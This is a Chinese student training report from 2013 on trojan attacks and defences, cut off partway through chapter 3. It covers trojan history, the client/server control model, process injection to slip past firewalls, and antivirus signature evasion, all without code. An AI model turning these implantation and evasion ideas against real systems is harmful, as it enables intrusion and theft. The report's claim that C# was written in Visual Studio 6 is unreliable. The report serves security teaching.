孫璐-木馬攻擊預(yù)防與技術(shù)

PAGE沈陽工程學(xué)院實(shí)訓(xùn)報(bào)告實(shí)訓(xùn)題目：信息安全專題設(shè)計(jì)與實(shí)踐——木馬攻擊預(yù)防與技術(shù)系別信息工程學(xué)院班級(jí)信安本101學(xué)生姓名孫璐學(xué)號(hào)2010415103指導(dǎo)教師張小瑞鄭秀穎劉娜實(shí)訓(xùn)進(jìn)行地點(diǎn)：信息工程系網(wǎng)絡(luò)實(shí)驗(yàn)室任務(wù)下達(dá)時(shí)間：2013年11月18日起止日期：2013年11月18日起——至2013年12月20日止《信息安全專題設(shè)計(jì)與實(shí)踐》任務(wù)書一、性質(zhì)、任務(wù)和基本要求《信息安全專題設(shè)計(jì)與實(shí)踐》是一門以項(xiàng)目設(shè)計(jì)和技術(shù)開發(fā)、綜合集成為主要方式的綜合設(shè)計(jì)與實(shí)踐課程，是計(jì)算機(jī)科學(xué)與技術(shù)專業(yè)信息安全方向的必修實(shí)驗(yàn)課程。通過專題項(xiàng)目的設(shè)計(jì)、開發(fā)和集成，要求學(xué)生把理論與實(shí)踐相結(jié)合，加深對專業(yè)概念和原理的理解，強(qiáng)化學(xué)生的設(shè)計(jì)能力、技術(shù)開發(fā)能力和綜合集成能力，達(dá)到鞏固專業(yè)知識(shí)，改善教學(xué)質(zhì)量，培養(yǎng)學(xué)生的創(chuàng)新性開發(fā)和實(shí)踐能力，為后續(xù)的畢業(yè)設(shè)計(jì)環(huán)節(jié)以及將來的實(shí)際工作打好堅(jiān)實(shí)的基礎(chǔ)。二、專題設(shè)計(jì)的具體內(nèi)容《信息安全專題設(shè)計(jì)與實(shí)踐》要求學(xué)生綜合利用本課程的有關(guān)知識(shí)，在教師的指導(dǎo)下，針對特定的某一專題方面的具體問題，完成從項(xiàng)目的需求分析、設(shè)計(jì)、到技術(shù)開發(fā)、綜合集成、測試等實(shí)現(xiàn)過程，最終實(shí)現(xiàn)一個(gè)較為完整的硬件或軟件系統(tǒng)。下面是各個(gè)階段的具體內(nèi)容。⒈項(xiàng)目分析制訂要開發(fā)或完成的安全系統(tǒng)的安全目標(biāo)。本階段應(yīng)該對整個(gè)系統(tǒng)情況作全面的、詳細(xì)的調(diào)查，分析該系統(tǒng)可能面臨安全風(fēng)險(xiǎn)和安全威脅。⒉制訂系統(tǒng)安全策略根據(jù)階段一分析的結(jié)果，制訂為保護(hù)系統(tǒng)安全所要采取的安全策略，說明所采用的安全策略與系統(tǒng)所面臨的安全風(fēng)險(xiǎn)和可能遭受的安全攻擊之間的關(guān)系，描述這種安全策略是如何降低系統(tǒng)安全風(fēng)險(xiǎn)的。說明要實(shí)施這種安全策略，需要采用何種安全技術(shù)或產(chǎn)品。⒊系統(tǒng)的實(shí)現(xiàn)根據(jù)前兩個(gè)階段的分析設(shè)計(jì)結(jié)果，通過編程或選用集成合適的工具產(chǎn)品，完成該系統(tǒng)的實(shí)現(xiàn)。實(shí)現(xiàn)過程是對安全技術(shù)的綜合運(yùn)用和裁剪過程，是學(xué)生綜合能力的運(yùn)用和體現(xiàn)。本階段要求學(xué)生寫出詳細(xì)的實(shí)現(xiàn)過程、步驟。對于編程實(shí)現(xiàn)的，要求描述主要的算法流程和數(shù)據(jù)結(jié)構(gòu)。對于產(chǎn)品部署和應(yīng)用的，要求寫出詳細(xì)的配置和部署的環(huán)境和功能。最后，要求針對實(shí)現(xiàn)進(jìn)行分析，說明該實(shí)現(xiàn)對系統(tǒng)安全需求的滿足程度、實(shí)現(xiàn)中的不足以及可以進(jìn)一步改進(jìn)和提高的地方。三、實(shí)訓(xùn)要求專題設(shè)計(jì)題目要求緊密圍繞密碼學(xué)、軟件安全、網(wǎng)絡(luò)安全、系統(tǒng)安全相關(guān)的教學(xué)內(nèi)容，通過專題設(shè)計(jì)這種實(shí)踐性教學(xué)環(huán)節(jié)，深入理解和鞏固信息安全的的基本概念、基本原理方法、安全技術(shù)等主要相關(guān)知識(shí)點(diǎn)，提高學(xué)生技術(shù)開發(fā)和解決實(shí)際問題的能力，鍛煉學(xué)生對安全技術(shù)的綜合運(yùn)用能力。專題設(shè)計(jì)可以按每人一個(gè)題目進(jìn)行，也可以把一個(gè)完整的較大的題目分解，由2-3人合作完成。鼓勵(lì)學(xué)生發(fā)揮自主創(chuàng)新性，自主提出專題設(shè)計(jì)題目，提高學(xué)生發(fā)現(xiàn)問題的能力和對信息安全的興趣。學(xué)生自主提出的題目，經(jīng)指導(dǎo)教師審核認(rèn)可后，方可以按照該題目進(jìn)行專題設(shè)計(jì)任務(wù)。參考選題PKI和PMI系統(tǒng)設(shè)計(jì)與部署安全的遠(yuǎn)程控制與訪問系統(tǒng)基于開源的防火墻系統(tǒng)的定制與開發(fā)蜜罐蜜網(wǎng)系統(tǒng)設(shè)計(jì)與實(shí)現(xiàn)內(nèi)網(wǎng)加密防護(hù)系統(tǒng)的設(shè)計(jì)與實(shí)施操作系統(tǒng)安全審計(jì)系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn)WEB滲透技術(shù)的分析與實(shí)現(xiàn)嵌入式防火墻系統(tǒng)嵌入式漏洞掃描系統(tǒng)四、實(shí)訓(xùn)報(bào)告要求專題設(shè)計(jì)的設(shè)計(jì)報(bào)告是學(xué)生對本次專題設(shè)計(jì)的全面總結(jié)，應(yīng)該反映每個(gè)設(shè)計(jì)階段的設(shè)計(jì)思路和設(shè)計(jì)內(nèi)容。該設(shè)計(jì)報(bào)告，應(yīng)作為整個(gè)專題設(shè)計(jì)評(píng)分的書面依據(jù)和存檔材料。設(shè)計(jì)報(bào)告一般要以固定規(guī)格的紙張（如A4）書寫或打印并裝訂，字跡及圖形要清楚，工整，規(guī)范。內(nèi)容及要求如下：⑴設(shè)計(jì)任務(wù)、要求及所用軟硬件環(huán)境或工具介紹。⑵專題設(shè)計(jì)內(nèi)容中要求的分析設(shè)計(jì)結(jié)果。⑶實(shí)現(xiàn)過程和結(jié)果⑷驗(yàn)收情況，總結(jié)五、成績評(píng)定標(biāo)準(zhǔn)專題設(shè)計(jì)的成績評(píng)定以選定課題的難易度，完成情況和設(shè)計(jì)報(bào)告為依據(jù)綜合評(píng)分。從總體來說，所設(shè)計(jì)的系統(tǒng)應(yīng)該符合設(shè)計(jì)要求，設(shè)計(jì)過程中的每一個(gè)階段均應(yīng)提供正確的文檔（設(shè)計(jì)報(bào)告），設(shè)計(jì)報(bào)告要符合規(guī)范要求。序號(hào)報(bào)告內(nèi)容所占比重評(píng)分原則不給分及格中等良好優(yōu)秀1問題描述5%沒有不完整基本正確描述正確描述準(zhǔn)確2設(shè)計(jì)思想10%沒有不完整基本可行方案良好很有說服力3具體設(shè)計(jì)的正確性70%不正確不完整基本正確正確，清晰正確，清晰4組內(nèi)是否前后一致5%不一致有些不一致基本一致一致完全一致5其他10%包括是否按時(shí)完成，報(bào)告格式，字跡、語言等等六、參考資料1．石志國，薛為民，尹浩編著，計(jì)算機(jī)網(wǎng)絡(luò)安全教程，北方交通大學(xué)出版社，2007年1月2．（美）斯托林斯（Stallings,W.）著，孟慶樹等譯，密碼編碼學(xué)與網(wǎng)絡(luò)安全——原理與實(shí)踐（第四版），電子工業(yè)出版社，2006年11月3．（美）馬里克（Malik,S.）著；王寶生，朱培棟，白建軍譯，網(wǎng)絡(luò)安全原理與實(shí)踐，人民郵電出版社，2008年08月4．周繼軍，蔡毅主編，網(wǎng)絡(luò)與信息安全基礎(chǔ)（重點(diǎn)大學(xué)計(jì)算機(jī)專業(yè)系列教材），清華大學(xué)出版社，2008年08月。5．張敏波編著，網(wǎng)絡(luò)安全實(shí)戰(zhàn)詳解(企業(yè)專供版)，電子工業(yè)出版社，2008年05月6．楊波等編著.現(xiàn)代密碼學(xué)，清華大學(xué)出版社，2003年.7.關(guān)振勝等編著.公鑰基礎(chǔ)設(shè)施PKI及其應(yīng)用，電子工業(yè)出版社，2008年.8.傅建明，彭國軍,張煥國編著.計(jì)算機(jī)病毒分析與對抗，武漢大學(xué)出版社，2004年.9.陳志雨等編著，計(jì)算機(jī)信息安全技術(shù)應(yīng)用，電子工業(yè)出版社，2005年.10.

胡錚等編著，

網(wǎng)絡(luò)與信息安全，清華大學(xué)出版社，2006年.11.王景中，徐小青等編著，計(jì)算機(jī)通信信息安全技術(shù)，清華大學(xué)出版社，2006年.12.楚狂等編著，網(wǎng)絡(luò)安全與防火墻技術(shù)，人民郵電出版社，2000年.13.胡建偉等編著，網(wǎng)絡(luò)對抗原理，西安電子科技大學(xué)出版，2004年.14.杜曄

張大偉

范艷芳.網(wǎng)絡(luò)攻防技術(shù)教程:從原理到實(shí)踐，武漢大學(xué)出版社，2008年.

實(shí)訓(xùn)成績評(píng)定表序號(hào)報(bào)告內(nèi)容所占比重評(píng)分原則最后得分不給分及格中等良好優(yōu)秀1問題描述5%沒有不完整基本正確描述正確描述準(zhǔn)確2設(shè)計(jì)思想10%沒有不完整基本可行方案良好很有說服力3設(shè)計(jì)的正確性70%不正確不完整基本正確正確，清晰正確清晰4前后一致5%不一致有些不一致基本一致一致完全一致5其他10%包括是否按時(shí)完成，報(bào)告格式，字跡、語言等等總分最后成績指導(dǎo)教師簽名（蓋章）：信息安全專題設(shè)計(jì)與實(shí)踐摘要PAGEII摘要在網(wǎng)絡(luò)信息系統(tǒng)中，木馬技術(shù)由于其隱蔽性、遠(yuǎn)程可植入性和可控制性等特點(diǎn)，已成為黑客攻擊或不法分子入侵或控制其他人網(wǎng)絡(luò)或計(jì)算機(jī)系統(tǒng)的重要工具，因此，研究和分析各種木馬的工作原理和功能。木馬種植的技巧和思路、木馬自啟動(dòng)以及隱藏的方法，進(jìn)而針對一些典型的木馬攻擊提出了相應(yīng)的解決方法，建立一套相對比較完善的防御體系，是主動(dòng)防范木馬入侵或者攻擊的有效方法之一，也是維護(hù)信息系統(tǒng)安全的重要任務(wù)。為了從源頭上了解和認(rèn)識(shí)木馬，以便減少被木馬攻擊帶來的危害，本文系統(tǒng)地研究和分析了各種木馬的工作原理和功能、木馬種植的技巧和思路、木馬自啟動(dòng)以及隱藏的方法，以及木馬發(fā)展的歷史和今后的發(fā)展方向，并針對一些典型的木馬攻擊提出了相應(yīng)的解決方法，可為從事網(wǎng)絡(luò)管理活動(dòng)的機(jī)構(gòu)和個(gè)人借鑒與參考，推動(dòng)我國網(wǎng)絡(luò)信息化的健康發(fā)展。關(guān)鍵詞：木馬技術(shù)；遠(yuǎn)程控制；NET類；信息安全專題設(shè)計(jì)與實(shí)踐Abstract

AbstractInthenetworkinformationsystems,theTrojantechniquehasbeenusedastheimportanttoolbyhackersorlawlesspersonstoinvadeorcontrolothernetworkorcomputerbecauseofitsspecialityofconcealment,remoteloadingandcontrol.WemustunderstandthetrojanhorsefromsourcesothatwecanreducethedamagebroughtbytheTrojanhorse.Thisthesissystematicallystudiesandanalyzestheprincipleandfunctionofvarioustrojanhorses,thetechniquesandideasoftrojanloading,thestartupmethodsandhiddenmethodsofthetrojanhorses,andthehistoryandthedevelopmentdirectionofthetrojanhorses.Byprovidingacorresponsiveresolventforthosetypicaltrojanhorseattack,thistheiswiilbeusedasthereferencefororganizationsandpersonnelsintheirengaginginthenetworkmanagemantactivity.Anditwouldbehelpfulinimpellinghealthydevelopmentofnetworkinformationsystem,Keywords:

Trojanhorse;Internet;Attack;Protection;leaks;backdoor;信息安全專題設(shè)計(jì)與實(shí)踐目錄PAGEIII目錄摘要 IAbstract II第1章緒論 11.1選題背景 11.2研究現(xiàn)狀 31.3主要工作 3第2章程序設(shè)計(jì)平臺(tái) -4-2.1開發(fā)工具 -4-2.2開發(fā)語言 -4-第3章主要原理 -5-3.1木馬工作原理 -5-3.2木馬種植原理 -5-3.3木馬隱藏原理 -7-3.4木馬通信原理 -7-第4章系統(tǒng)分析與設(shè)計(jì) -9-4.1整體設(shè)計(jì) -9-4.2系統(tǒng)功能、結(jié)構(gòu)設(shè)計(jì)，軟件流程圖 -9-4.2.1軟件的功能結(jié)構(gòu)圖如下 -9-4.2.2后門技術(shù) -10-4.2.3總體流程 -10-4.3程序清單及說明 -10-4.3.1程序清單 -10-4.3.2程序代碼及說明 -10-4.4軟件流程圖如下 -21-4.5實(shí)驗(yàn)結(jié)果及結(jié)論 -22-第5章木馬的防范措施 -25-結(jié)論 -28-參考文獻(xiàn) 29信息安全專題設(shè)計(jì)與實(shí)踐第1章緒論-PAGE3-第1章緒論1.1選題背景隨著信息技術(shù)的飛速發(fā)展，計(jì)算機(jī)和計(jì)算機(jī)通信網(wǎng)絡(luò)己經(jīng)成為當(dāng)今社會(huì)不可缺少的基本組成部分，依托互聯(lián)網(wǎng)技術(shù)的全球信息化浪潮沖擊和深刻影響著人類政治、經(jīng)濟(jì)、社會(huì)的方方面面，對經(jīng)濟(jì)發(fā)展、國家安全、國民教育和現(xiàn)代管理都起著重要的作用。隨著網(wǎng)絡(luò)技術(shù)和信息化應(yīng)用范圍的不斷擴(kuò)大，網(wǎng)絡(luò)信息應(yīng)用領(lǐng)域開始從傳統(tǒng)的、小型業(yè)務(wù)系統(tǒng)逐漸向大型、關(guān)鍵業(yè)務(wù)系統(tǒng)擴(kuò)展，如政府部門業(yè)務(wù)系統(tǒng)、金融業(yè)務(wù)系統(tǒng)、教育科研系統(tǒng)等等。但隨著網(wǎng)絡(luò)應(yīng)用的增加，以計(jì)算機(jī)信息系統(tǒng)為犯罪對象和犯罪工具的各類新型犯罪活動(dòng)不斷出現(xiàn)。網(wǎng)絡(luò)安全風(fēng)險(xiǎn)也不斷暴露出來，網(wǎng)絡(luò)信息安全問題已經(jīng)成為制約各類網(wǎng)絡(luò)信息系統(tǒng)實(shí)用化和進(jìn)一步發(fā)展的不可忽視因素，對一些關(guān)系國民經(jīng)濟(jì)的重要信息系統(tǒng)和關(guān)系國家安全的網(wǎng)絡(luò)信息系統(tǒng)，己經(jīng)到了非解決不可的地步。其中，利用木馬技術(shù)入侵、控制和破壞網(wǎng)絡(luò)信息系統(tǒng)，是造成網(wǎng)絡(luò)信息安全問題的典型表現(xiàn)之一。木馬是一種基于C/S模式的遠(yuǎn)程控制技術(shù)，能在被監(jiān)控對象毫無察覺的情況下滲透到對方系統(tǒng)并隱藏在合法程序中的計(jì)算機(jī)程序。一旦植入和觸發(fā)成功，控制端與被控制端之間就能遵照TCP/IP協(xié)議進(jìn)行數(shù)據(jù)通信，從而使得控制者獲取被控制者的相關(guān)信息。它們通常以欺騙為手段，在用戶不知情的情況下進(jìn)行安裝，并暗中把所獲的機(jī)密信息發(fā)送給第三者，威脅用戶電腦中的數(shù)據(jù)安全并侵犯個(gè)人隱私，嚴(yán)重影響了人們正常工作和生活。2008年1月至10月，瑞星公司共截獲新病毒樣本930余萬個(gè)，其中絕大部分（776萬）是盜號(hào)木馬、后門程序，專門竊取網(wǎng)游賬號(hào)、網(wǎng)銀賬號(hào)等虛擬財(cái)產(chǎn)，具有極其明顯的經(jīng)濟(jì)利益特征。時(shí)隔兩年，不斷有新的木馬病毒被發(fā)現(xiàn)，社會(huì)上己經(jīng)掀起一個(gè)木馬研究的熱潮。正是在這樣的背景下，我的課題主要設(shè)計(jì)一個(gè)簡單的木馬程序，進(jìn)一步地了解木馬程序的結(jié)構(gòu)和實(shí)現(xiàn)原理，加深對相關(guān)知識(shí)的了解，進(jìn)而提高對木馬的防范水平。課題的相關(guān)背景計(jì)算機(jī)世界中的特洛伊木馬的名字來自著名的特洛伊戰(zhàn)記。故事說的是在古希臘時(shí)代，希臘人和特洛伊人發(fā)生了戰(zhàn)爭，在圍困特洛伊城長達(dá)整整十年后仍不能攻陷。后來希臘人把一批勇士藏匿于巨大無比的木馬后退兵，當(dāng)特洛伊人將木馬作為戰(zhàn)利品拖入城內(nèi)時(shí)，高大的木馬正好卡在城門間，進(jìn)退兩難，夜晚木馬內(nèi)的勇士們爬出來，與城外的部隊(duì)里應(yīng)外合而攻下了特洛伊城。而計(jì)算機(jī)世界的特洛伊木馬(Trojan)是指隱藏在正常程序中的一段具有特殊功能的惡意代碼，是具備破壞和刪除文件、發(fā)送密碼、記錄鍵盤和拒絕服務(wù)攻擊等特殊功能的后門程序。世界上第一個(gè)計(jì)算機(jī)木馬是出現(xiàn)在1986年的PC-Write木馬。它偽裝成共享軟件PC-Write的2.72版本（事實(shí)上，編寫PC-Write的Quicksoft公司從未發(fā)行過2.72版本），一旦用戶信以為真運(yùn)行該木馬程序，那么他的下場就是硬盤被格式化。此時(shí)的第一代木馬還不具備傳染特征。1989年出現(xiàn)了AIDS木馬。由于當(dāng)時(shí)很少有人使用電子郵件，所以AIDS的作者就利用現(xiàn)實(shí)生活中的郵件進(jìn)行散播：給其他人寄去一封封含有木馬程序軟盤的郵件。之所以叫這個(gè)名稱是因?yàn)檐洷P中包含有AIDS和HIV疾病的藥品，價(jià)格，預(yù)防措施等相關(guān)信息。軟盤中的木馬程序在運(yùn)行后，雖然不會(huì)破壞數(shù)據(jù)，但是他將硬盤加密鎖死，然后提示受感染用戶花錢消災(zāi)。可以說第二代木馬已具備了傳播特征(盡管通過傳統(tǒng)的郵遞方式)。但隨著Internet的普及，新一代的木馬出現(xiàn)了，它兼?zhèn)鋫窝b和傳播兩種特征并結(jié)合TCP/IP網(wǎng)絡(luò)技術(shù)四處泛濫。木馬的主要目標(biāo)也不再是進(jìn)行文件和系統(tǒng)的破壞，而是帶有收集密碼，遠(yuǎn)程控制等功能，這段時(shí)期比較有名的有國外的BO2000(BackOrifice)和國內(nèi)的冰河木馬。它們有如下共同特點(diǎn)：基于網(wǎng)絡(luò)的客戶端/服務(wù)器應(yīng)用程序。具有搜集信息、執(zhí)行系統(tǒng)命令、重新設(shè)置機(jī)器、重新定向等功能。當(dāng)木馬程序攻擊得手后，計(jì)算機(jī)就完全成為黑客控制的傀儡主機(jī)，黑客成了超級(jí)用戶，用戶的所有計(jì)算機(jī)操作不但沒有任何秘密而言，而且黑客可以遠(yuǎn)程控制傀儡主機(jī)對別的主機(jī)發(fā)動(dòng)攻擊，這時(shí)候被俘獲的傀儡主機(jī)成了黑客進(jìn)行進(jìn)一步攻擊的擋箭牌和跳板。這時(shí)期的木馬比較顯著的特點(diǎn)是以單獨(dú)的程序形勢存在，帶來的問題是木馬的網(wǎng)絡(luò)行為很容易被一些個(gè)人防火墻所阻斷，為了解決這個(gè)問題，一個(gè)新的技術(shù)被廣泛應(yīng)用，這就是進(jìn)程注入技術(shù)。進(jìn)程注入技術(shù)是將代碼注入到另一個(gè)進(jìn)程，并以其上下文運(yùn)行的一種技術(shù)，木馬經(jīng)常注入自己到IE瀏覽器中，由于IE瀏覽器經(jīng)常需要訪問網(wǎng)絡(luò)，因此在防火墻彈出是否允許IE瀏覽器訪問網(wǎng)絡(luò)時(shí)，用戶經(jīng)常會(huì)點(diǎn)擊允許，殊不知自己機(jī)器中的木馬已經(jīng)偷偷地去連接網(wǎng)絡(luò)了。但對于殺毒軟件來說，使用成熟的特征碼殺毒技術(shù)仍然可以通過和對病毒同樣的處理手段對此時(shí)的木馬進(jìn)行查殺。但從04年開始，一切變得不一樣了。2004年，在黑客圈子內(nèi)部，有人公開提出免殺技術(shù)，這種技術(shù)是針對殺毒軟件的特征碼直接修改木馬的二進(jìn)制代碼，由于當(dāng)時(shí)還沒有強(qiáng)有力的工具出現(xiàn)，所以一般都使用WinHEX工具逐字節(jié)更改，需要相當(dāng)?shù)募夹g(shù)能力，這種手工方式只在少數(shù)黑客內(nèi)部流傳。2005年，著名的免殺工具CCL一個(gè)自動(dòng)化的特征碼定位工具被公布，這使得免殺技術(shù)在很短的時(shí)間內(nèi)開始公開化，一批黑客站點(diǎn)有意或無意的宣傳使得越來越多的人開始討論免殺技術(shù)，各大殺毒軟件面臨嚴(yán)重的信任危機(jī)，一個(gè)懂一點(diǎn)基本的PE文件知識(shí)與免殺工具的使用的初學(xué)者就可以輕易編輯一個(gè)木馬，修改其特征碼使其躲過殺毒軟件的檢測，據(jù)統(tǒng)計(jì)，著名木馬灰鴿子曾在短短一年之內(nèi)出現(xiàn)超過6萬個(gè)變種，絕大部分都源于免殺技術(shù)的普及。同樣也是在這一年，一些殺毒廠商提出“主動(dòng)防御”的概念，這門聽起來顯得很專業(yè)的技術(shù)是用來增強(qiáng)已經(jīng)對木馬不再構(gòu)成殺傷力的特征碼識(shí)別技術(shù)，通過對病毒行為規(guī)律分析、歸納、總結(jié)，并結(jié)合反病毒專家判定病毒的經(jīng)驗(yàn)，提煉成病毒識(shí)別規(guī)則知識(shí)庫。模擬專家發(fā)現(xiàn)新病毒的機(jī)理，通過對各種程序動(dòng)作的自動(dòng)監(jiān)視，自動(dòng)分析程序動(dòng)作之間的邏輯關(guān)系，綜合應(yīng)用病毒識(shí)別規(guī)則知識(shí)，實(shí)現(xiàn)自動(dòng)判定新病毒，達(dá)到主動(dòng)防御的目的。通過這種技術(shù)，在木馬訪問網(wǎng)絡(luò)，注入進(jìn)程等行為發(fā)生時(shí)殺毒軟件會(huì)及時(shí)通告給用戶，雖然還不完善，但至少還是可以對未知的木馬做出一定的預(yù)警。另一個(gè)有變革性意義的技術(shù)是安全廠商推出的云安全技術(shù)，這項(xiàng)技術(shù)將從過去由用戶受到攻擊之后再殺毒到現(xiàn)在的側(cè)重于防毒，實(shí)現(xiàn)一個(gè)根本意義上的轉(zhuǎn)變。當(dāng)前已經(jīng)出現(xiàn)的云安全實(shí)現(xiàn)原理大概可以分為兩種：一種是由趨勢科技提出的“SecureCloud”，以Web信譽(yù)服務(wù)(WRS)、郵件信譽(yù)服務(wù)(ERS)和文件信譽(yù)服務(wù)(FRS)為基礎(chǔ)架構(gòu)的云客戶端安全架構(gòu)，把病毒特征碼文件保存到互聯(lián)網(wǎng)云數(shù)據(jù)庫中，令其在端點(diǎn)處保持最低數(shù)量用于驗(yàn)證。其核心在于兩點(diǎn)：①對復(fù)合式攻擊的攔截。通過對疑似病毒組件各部分外延屬性進(jìn)行檢查，判斷威脅程度；②瘦客戶端。大量的病毒特征碼保存在云數(shù)據(jù)庫中。簡言之，趨勢科技云安全技術(shù)基于其擁有龐大的服務(wù)器群和并行處理能力，構(gòu)架了一個(gè)龐大的黑白名單服務(wù)器群，用于客戶端查詢，在Web威脅到達(dá)最終用戶或公司網(wǎng)絡(luò)之前即對其予以攔截。國內(nèi)安全廠商瑞星也提出了云安全的概念，與趨勢科技服務(wù)器群“云”不同，瑞星的“云”則建立在廣大的互聯(lián)網(wǎng)用戶上。通過在用戶客戶端安裝軟件監(jiān)控網(wǎng)絡(luò)中軟件行為的異常，將發(fā)現(xiàn)的疑似木馬、惡意程序最新信息推送到瑞星的服務(wù)器進(jìn)行自動(dòng)分析和處理，然后再把病毒和木馬的解決方案分發(fā)到每一個(gè)客戶端。以上兩種云安全概念采用的是兩種完全不同的模式。趨勢科技強(qiáng)調(diào)的是阻止外來威脅，基礎(chǔ)是龐大的服務(wù)器群；瑞星強(qiáng)調(diào)的則是對用戶計(jì)算機(jī)上業(yè)已存在的未知威脅進(jìn)行感知，基礎(chǔ)是必須擁有大量的客戶端用戶。這兩種模式都有一定的缺陷，趨勢科技忽略了對本機(jī)威脅的收集，而瑞星的云安全則只能被動(dòng)防守，不能在未知威脅進(jìn)入到電腦前進(jìn)行攔截。但另一方面，無論哪種云安全概念，都可以縮短殺毒軟件的響應(yīng)時(shí)間，從整個(gè)互聯(lián)網(wǎng)的層面上最大程度地確保客戶系統(tǒng)的安全。1.2研究現(xiàn)狀國內(nèi)對網(wǎng)絡(luò)攻防的研究表現(xiàn)為信息戰(zhàn)、網(wǎng)絡(luò)戰(zhàn)等，其注意力是軍事戰(zhàn)場上的信息和網(wǎng)絡(luò)系統(tǒng)的較量，代表性的成果是我國著名學(xué)者沈偉光的信息戰(zhàn)思想。大多研究側(cè)重在管理層面上討論，涉及的技術(shù)層面相對較少。國外對網(wǎng)絡(luò)攻防的研究明顯傾向于理工科式的邏輯思維，不少專家、學(xué)者從各自學(xué)科領(lǐng)域的角度闡述網(wǎng)絡(luò)對抗的思想，出現(xiàn)了許多對抗模式、模型來解析對抗這一博弈過程;將攻防看成是跨領(lǐng)域的課題予以探討，重點(diǎn)仍是孤立地研究單獨(dú)的攻擊或防御的數(shù)學(xué)模型、體系結(jié)構(gòu)等，對攻防的整體性把握仍有欠缺。對于網(wǎng)絡(luò)安全，比較而言，國內(nèi)研究的是重點(diǎn)領(lǐng)域（軍事），國外探索的整個(gè)人類社會(huì)的全過程、多領(lǐng)域，前者比較細(xì)致但不精確，后者比較全面但不專一。很少有人專門把攻擊和防御作為一個(gè)整體、一對矛盾單獨(dú)考察，也鮮有文獻(xiàn)或著作把攻防當(dāng)作一門獨(dú)立的學(xué)問或藝術(shù)予以研究。以前的研究總是將這本是一體的事物割裂開來加以討論，得出的結(jié)果往往就是“矛與盾”的評(píng)價(jià)。網(wǎng)絡(luò)安全本身就沒有固定的尺度和科學(xué)的標(biāo)準(zhǔn)來衡量，迫切需要新的可視化的標(biāo)準(zhǔn)對其規(guī)范。1.3主要工作計(jì)算機(jī)網(wǎng)絡(luò)入侵會(huì)給系統(tǒng)帶來災(zāi)難性的后果，為了降低網(wǎng)絡(luò)入侵帶來的風(fēng)險(xiǎn)，可以運(yùn)用網(wǎng)絡(luò)攻防實(shí)驗(yàn)來模擬網(wǎng)絡(luò)入侵。本文闡述了攻防實(shí)驗(yàn)是對系統(tǒng)風(fēng)險(xiǎn)評(píng)估的有效手段，是信息安全技術(shù)的重要組成部分。攻防實(shí)驗(yàn)在剛起步的時(shí)候僅僅是對信息安全技術(shù)的有效提升，而之后它的重要性會(huì)逐漸增加并開始成為信息系統(tǒng)風(fēng)險(xiǎn)評(píng)估的重要技術(shù)補(bǔ)充。重點(diǎn)從技術(shù)的角度敘述了攻防實(shí)驗(yàn)的主要方法，從而使攻防實(shí)驗(yàn)井然有序地進(jìn)行。信息安全專題設(shè)計(jì)與實(shí)踐第2章程序設(shè)計(jì)平臺(tái)4-

第2章程序設(shè)計(jì)平臺(tái)2.1開發(fā)工具本課程設(shè)計(jì)使用了MicrosoftVisualStudio6作為開發(fā)工具，使用C#作為開發(fā)語言。VisualStudio6提供了高級(jí)開發(fā)工具、調(diào)試功能和創(chuàng)新功能，幫助在各種平臺(tái)上快速創(chuàng)建當(dāng)前最先進(jìn)的應(yīng)用程序。開發(fā)人員能夠利用這些豐富的客戶端和服務(wù)器端框架輕松構(gòu)建以客戶為中心的Web應(yīng)用程序，這些應(yīng)用程序可以集成任何后端數(shù)據(jù)提供程序、在任何當(dāng)前瀏覽器內(nèi)運(yùn)行并完全訪問ASP.NET應(yīng)用程序服務(wù)和Microsoft平臺(tái)。2.2開發(fā)語言設(shè)計(jì)使用C#語言。C#與C++很相似，還借鑒了Java的許多特點(diǎn)。但是C#比C++更安全、比Java更高效，特別適合于Windows環(huán)境下的.NET編程。C#是一種面向?qū)ο蟮某绦蛟O(shè)計(jì)語言，最初是作為.NET的一部分而開發(fā)的。換句話說，.NET是圍繞C#而開發(fā)的。C#的面向過程和對象的語法，是基于C++的，但也包含了另外幾種程序設(shè)計(jì)語言的特征（其中最顯著的是Delphi、VisualBasic和Java），C#特別強(qiáng)調(diào)簡易性（如所需符號(hào)比C++的少、所需修飾比Java的少）。用C#進(jìn)行托管代碼編程，具有如下優(yōu)點(diǎn)：完全面向?qū)ο蟮脑O(shè)計(jì)、非常強(qiáng)的類型安全、很好地融合了VB和C++的強(qiáng)大功能、垃圾內(nèi)存回收、類似于C++的語法和關(guān)鍵字、用委托取代函數(shù)指針增強(qiáng)了類型安全、為程序員提供版本處理技術(shù)可解決老版本的程序不能在新DLL下運(yùn)行的“動(dòng)態(tài)鏈接庫地獄”（DLLhell）問題。信息安全專題設(shè)計(jì)與實(shí)踐第3章主要原理

第3章主要原理3.1木馬工作原理木馬是一類特殊的計(jì)算機(jī)程序，其作用是在一臺(tái)計(jì)算機(jī)上監(jiān)控被植入木馬的計(jì)算機(jī)的情況。所以木馬的結(jié)構(gòu)是一種典型的客戶端/服務(wù)器(C/S)模式。木馬程序一般分為客戶端(Clinet)和服務(wù)器端(Server)，服務(wù)器端程序是控制者傳到目標(biāo)計(jì)算機(jī)的部分，騙取用戶執(zhí)行后，便植入計(jì)算機(jī)，作為響應(yīng)程序。客戶端是用來控制目標(biāo)主機(jī)的部分，安裝在控制者的計(jì)算機(jī)，它的作用是連接木馬服務(wù)器端程序，監(jiān)視或控制遠(yuǎn)程計(jì)算機(jī)。典型的木馬工作原理是：當(dāng)服務(wù)器端在目標(biāo)計(jì)算機(jī)上被執(zhí)行后，木馬打開一個(gè)默認(rèn)的端口進(jìn)行監(jiān)聽，當(dāng)客戶機(jī)向服務(wù)器端提出連接請求，服務(wù)器上的相應(yīng)程序就會(huì)自動(dòng)運(yùn)行來應(yīng)答客戶機(jī)的請求，服務(wù)器端程序與客戶端建立連接后，由客戶端發(fā)出指令，服務(wù)器在計(jì)算機(jī)中執(zhí)行這些指令，并將數(shù)據(jù)傳送到客戶端，以達(dá)到控制主機(jī)的目的。如圖3.1所示。木馬客戶端木馬客戶端木馬服務(wù)端指令結(jié)果TCP/IP連接圖3.1木馬服務(wù)器端與客戶端的通信這是木馬程序的基本工作原理，其中還包括木馬的種植，隱藏，通信等。下面分別就相關(guān)技術(shù)原理展開論述。3.2木馬種植原理特洛伊木馬大都采用客戶機(jī)/服務(wù)器模式：客戶端程序是在你自己的PC機(jī)上運(yùn)行．服務(wù)器端程序是安裝在目標(biāo)主機(jī)上運(yùn)行。如果你不能把服務(wù)器端程序植入目標(biāo)主機(jī)，那么你的特洛伊木馬程序功能再完善，也沒有辦法啟動(dòng)木馬的功能。通常特洛伊木馬的植入技術(shù)有以下幾種：⑴通過網(wǎng)上鄰居(即共享入侵)要求:對方